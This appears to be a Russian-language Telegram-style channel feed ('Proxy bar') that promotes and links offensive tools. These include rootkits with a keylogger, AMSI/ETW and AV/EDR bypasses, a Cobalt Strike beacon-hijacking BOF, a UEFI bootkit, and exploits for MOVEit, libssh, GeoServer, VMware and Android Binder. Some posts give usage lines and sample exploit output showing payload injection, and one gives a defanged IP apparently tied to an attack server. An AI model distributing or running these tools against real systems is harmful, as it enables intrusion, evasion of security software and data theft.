Rootkit INTRACTABLEGIRAFFE
proof of concept
*
Из прикольного:
Использует скрытую виртуальную файловую систему (VFS) для хранения файлов за пределами стандартной файловой системы Windows. При чем как энергозависимую, так и энергонезависимую скрытую VFS.
Keylogger - для демонстрации
*
download

#windows #rootkit

Какой боевой
hXXp://34.101.154.50/

CVE-2022-20421
Bad Spin: Android Binder Privilege Escalation Exploit
download

#android

Прикольно, но зачем последний октет иксить
brute.fail

#bruteforce

Создаем и обфусцируем DLL которая отключит AMSI и ETW
readME
download LightsOut

SignatureGate
Боевая версия HellsGate, обходящая AV/EDR/EPP путем злоупотребления опциональным исправлением CVE-2013-3900
download

#bypass #edr

DropSpawn
CobaltStrike BOF для создания маяков с использованием DLL Application Directory Hijacking
download

libssh CVE-2023-2283
POC exploit
usage:
~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub

#ssh

SharpTerminator
Поубивать процессы AV/EDR с помощью драйвера ядра
download

#edr

CVE-2023-25157
GeoServer SQL Injection - POC exploit
GeoServer SQL Injection - check vuln noscript

Не обновляйтесь до новой версии Debian 12
critical bugs
Охереть релиз))

#debian #LoL 🧐

MySQL Fake Server
download
+docker

CVE-2023-34362 MOVEit
1. exploit + crt + pem + pub
2. exploit RUBY
Usage:
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file

когда логика привела к 6 ошибкам )

#humor

CVE-2023-2008
Бага в драйвере udmabuf ядра Linux (исправлено в версии 5.19-rc4.)
impact такое себе, нужен доступ к /dev/udmabuf от kvm юзера
*
Analyzing and exploiting
exploit

#linux #exploit

CVE-2023-20887
VMWare vRealize Network Insight Pre-Authenticated
RCE exploit

#vmware #rce #exploit

anonfiles search
by гугле )

Rusty Bootkit
Windows UEFI Bootkit in Rust (Codename: RedLotus)

download

#bootkit #win #rust

Banshee rootkit
Windows x64 Kernel Driver/Rootkit
Экспериментальный !!!
*
download

#rootkit #win

#РукаЛицо
📗Вопрос блокировки в РФ мессенджера WhatsApp не обсуждается, предпосылок нет — Шадаев.

🌚Обсуждается, ведется работа - так как через это дырявое вражеское приложение идет документооборот всех силовых структур России и не только силовых!!! - Ситников.

😎Хуле вы разнылись, внедряй повелевай VipNet hw-1000 и защищенная почта из рук в руки, голосовые через ТА-57 ))) - Администрация Proxy bar

#Пятница